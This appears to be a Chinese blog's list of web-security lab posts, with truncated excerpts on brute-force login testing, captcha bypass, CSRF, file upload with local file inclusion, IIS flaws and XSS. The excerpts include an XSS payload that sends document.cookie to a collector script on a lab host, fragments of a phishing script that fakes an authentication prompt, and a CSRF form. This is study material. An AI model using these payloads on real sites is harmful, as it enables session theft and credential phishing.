web安全
个人随笔
也森
这个作者很懒,什么都没留下…
展开
-
暴力破解测试
一、简单破解1.输入账号密码2.发送到攻击模块4.设置变量以及攻击方式5.导入字典,开始攻击6.选出长度差别较大的一项为结果二、验证码复用破解1.输入账号密码2.发送到重放和攻击模块3.实行重放4.设置变量5.导入账号字典6.导入密码字典并开始攻击7.长度差异较大为正确账号密码...原创 2020-07-02 17:14:20 · 716 阅读 · 0 评论 -
搭建weblogic服务器并测试
一、搭建Weblogic服务器1.网上有很多教程,一看就会。我就不写了2.搭建好了之后,点击这样一个应用输入账号密码就能进去了或者直接到安装目录打开3.输入 localhost:7001/console 就能进到控制台了二、新建JNID数据源1.点击一般数据源2.输入数据源名称并选择数据库类型3.选择第一个数据源驱动4.选择如图5.依次输入名称、主机名、端口号等。。。。。。6.点击测试配置,成功如图所示;若失败可能有..原创 2020-06-24 21:33:11 · 688 阅读 · 0 评论 -
负载均衡的实验
一、下载nginx安装到服务器1)启动nginx2)访问本地localhost二、实验规划 1台客户端 1个负载均衡服务器172.20.171.172 2个网页服务器 1)192.168.56.129 2)linux.51yip.com三、...原创 2020-06-23 18:47:58 · 943 阅读 · 0 评论 -
IIS的配置及漏洞验证
首先在Windows server 2003 上安装好 IIS 6一、配置好IIS并进入IIS管理器1.新建网站时,站名自取,建好之后,右击新建好的网站,点击属性.2.进入后点击主目录,再点击主目录下的配置.3.在调试标志的两个框里打勾.4.在选项中启用父路径.5.1)点击文档.2)添加index.php并将其上移之第一行.3)点确定.6.将框中的区域选项修改为允许.7.运行成功.二、IIS漏洞验证漏洞一II原创 2020-06-22 22:07:52 · 444 阅读 · 0 评论 -
上传漏洞与本地文件包含结合实验
一、了解不安全文件上传漏洞-getimagesize()伪造包含漏洞的图片文件二、将含有漏洞的图片上传至服务器1.更改地址2.生成脚本文件至服务器三、启动脚本显示出所有系统信息...原创 2020-05-29 13:39:49 · 299 阅读 · 0 评论 -
CSRF(post)漏洞复现
一、分析代码发现验证refer,没有token验证,没有防止csrf的措施二、构建一个错误信息脚本csrf_poc.php放入http://192.168.56.129/pikachu-master/vul/csrf 中<html> <body> <form name="px" method="post" action="http://192.168.56.129/pikachu-master/vul/csrf/csrf.原创 2020-05-25 20:50:45 · 1394 阅读 · 0 评论 -
滑动验证码的破解
一、查看网页源码该页面可以通过name=‘token’及value的调用来进行绕过二、使用宏命令来调用token1.创建宏命令2.添加规则3.测试宏命令是否成功重放前重放后token值发生变化,调用成功三、开始攻击1.发送到攻击模块,设置变量及攻击方式2.导入字典,开始攻击长度为496的为正确结果...原创 2020-05-21 20:57:25 · 615 阅读 · 0 评论 -
存储xss修复
一、输入payload<script>alert('存储型XSS')</script>二、替换代码 $stop = array(" +","- "," 0","o "," a","b","c "); $start = array("<",">","(",")","\'","/","\"); $message = str_re...原创 2020-05-03 20:59:12 · 706 阅读 · 0 评论 -
完成xss漏洞利用-XSS钓鱼实验
一、钓鱼脚本fish.php<?phperror_reporting(0);// var_dump($_SERVER);if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {//发送认证框,并给出迷惑性的info header('Content-type:t...原创 2020-04-25 19:02:19 · 620 阅读 · 3 评论 -
【xss漏洞】cookie获取与利用实验
一、相关函数方法 解释 document.location=‘url’ 转跳指定url document.cookie 返回该页面cookie值 二、构建payload<script>document.location='http://192.168.56.132/pkxss/xcookie/cookie.php?cookie='+documen...原创 2020-04-18 19:45:33 · 458 阅读 · 0 评论